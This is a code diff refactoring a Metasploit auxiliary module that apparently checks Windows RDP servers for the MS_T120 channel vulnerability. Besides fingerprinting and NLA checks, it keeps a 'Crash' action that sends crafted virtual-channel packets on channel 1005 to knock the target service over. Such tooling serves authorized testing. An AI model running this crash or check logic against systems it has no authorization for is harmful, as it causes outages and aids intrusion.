@@ -63,17 +63,17 @@ class MetasploitModule < Msf::Auxiliary
       print_good(status[1].to_s)
     elsif status == Exploit::CheckCode::Unsupported  # used to display custom msg error
       status = Exploit::CheckCode::Safe
-      print_status("The target service is not running or refused our connection.")
+      vprint_error("The target service is not running or refused our connection.")
     else
-      print_status(status[1].to_s)
+      vprint_status(status[1].to_s)
     end
 
     status
   end
 
   def rdp_reachable
-    connect
-    disconnect
+    rdp_connect
+    rdp_disconnect
     return true
   rescue Rex::ConnectionRefused
     return false
@@ -87,15 +87,12 @@ class MetasploitModule < Msf::Auxiliary
 
     begin
       begin
-        nsock = connect
+        rdp_connect
       rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
         return Exploit::CheckCode::Unsupported # used to display custom msg error
       end
 
-      status = Exploit::CheckCode::Detected
-
-      sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1)
-      status = check_rdp_vuln(nsock)
+      status = check_rdp_vuln
     rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e
       bt = e.backtrace.join("\n")
       vprint_error("Unexpected error: #{e.message}")
@@ -112,7 +109,7 @@ class MetasploitModule < Msf::Auxiliary
       vprint_line(bt)
       elog("#{e.message}\n#{bt}")
     ensure
-      disconnect
+      rdp_disconnect
     end
 
     status
@@ -143,32 +140,31 @@ class MetasploitModule < Msf::Auxiliary
       # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing
       # the payload size and sending more of them doesn't seem to improve the
       # reliability. It *seems* to happen more often on x64, I haven't seen it
-      # fail against x86. Repleated attempts will generally trigger the DoS.
+      # fail against x86. Repeated attempts will generally trigger the DoS.
       x86_string += "FF" * 1
       x64_string += "FF" * 2
     else
       vprint_status("Sending patch check payloads")
     end
 
-    # 0x03 = CHANNEL_FLAG_FIRST | CHANNEL_FLAG_LAST
-    x86_payload = build_virtual_channel_pdu(0x03, [x86_string].pack("H*"))
-    x64_payload = build_virtual_channel_pdu(0x03, [x64_string].pack("H*"))
+    chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST
+    channel_id = [1005].pack('S>')
+    x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack("H*")), channel_id)
+
+    x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack("H*")), channel_id)
 
     6.times do
-      # 0xed03 = Channel 1005
-      x86_packet = rdp_build_pkt(x86_payload, "\x03\xed")
       rdp_send(x86_packet)
-      x64_packet = rdp_build_pkt(x64_payload, "\x03\xed")
       rdp_send(x64_packet)
 
       # A single pass should be sufficient to cause DoS
       if action.name == 'Crash'
         sleep(1)
-        disconnect
+        rdp_disconnect
 
-        sleep(1)
+        sleep(5)
         if rdp_reachable
-          print_error("Target doesn't appear to have been crashed.")
+          print_error("Target doesn't appear to have been crashed. Consider retrying.")
           return Exploit::CheckCode::Unknown
         else
           print_good("Target service appears to have been successfully crashed.")
@@ -178,7 +174,7 @@ class MetasploitModule < Msf::Auxiliary
 
       # Quick check for the Ultimatum PDU
       begin
-        res = sock.get_once(-1, 1)
+        res = rdp_recv(-1, 1)
       rescue EOFError
         # we don't care
       end
@@ -193,7 +189,6 @@ class MetasploitModule < Msf::Auxiliary
           if res.include?(["0300000902f0802180"].pack("H*"))
             return Exploit::CheckCode::Vulnerable
           end
-          # vprint_good("#{bin_to_hex(res)}")
         end
       rescue RdpCommunicationError
         # we don't care
@@ -203,20 +198,40 @@ class MetasploitModule < Msf::Auxiliary
     Exploit::CheckCode::Safe
   end
 
-  def check_rdp_vuln(nsock)
+  def check_rdp_vuln
     # check if rdp is open
-    is_rdp, server_selected_proto = rdp_check_protocol
+    is_rdp, version_info = rdp_fingerprint
     unless is_rdp
-      vprint_status "Could not connect to RDP service."
+      vprint_error("Could not connect to RDP service.")
       return Exploit::CheckCode::Unknown
     end
+    rdp_disconnect
+    rdp_connect
+    is_rdp, server_selected_proto = rdp_check_protocol
 
-    if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto
+    requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto
+    product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'
+    info = "Detected RDP on #{peer} (Windows version: #{product_version})"
+
+    service_info = "Requires NLA: #{(!version_info[:product_version].nil? && requires_nla) ? 'Yes' : 'No'}"
+    info << " (#{service_info})"
+
+    vprint_status(info)
+
+    if requires_nla
       vprint_status("Server requires NLA (CredSSP) security which mitigates this vulnerability.")
       return Exploit::CheckCode::Safe
     end
 
-    success = rdp_negotiate_security(nsock, server_selected_proto)
+    chans = [
+      ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
+      ['MS_T120',   RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],
+      ['rdpsnd',  RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
+      ['snddbg',  RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
+      ['rdpdr',   RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],
+    ]
+
+    success = rdp_negotiate_security(chans, server_selected_proto)
     return Exploit::CheckCode::Unknown unless success
 
     rdp_establish_session
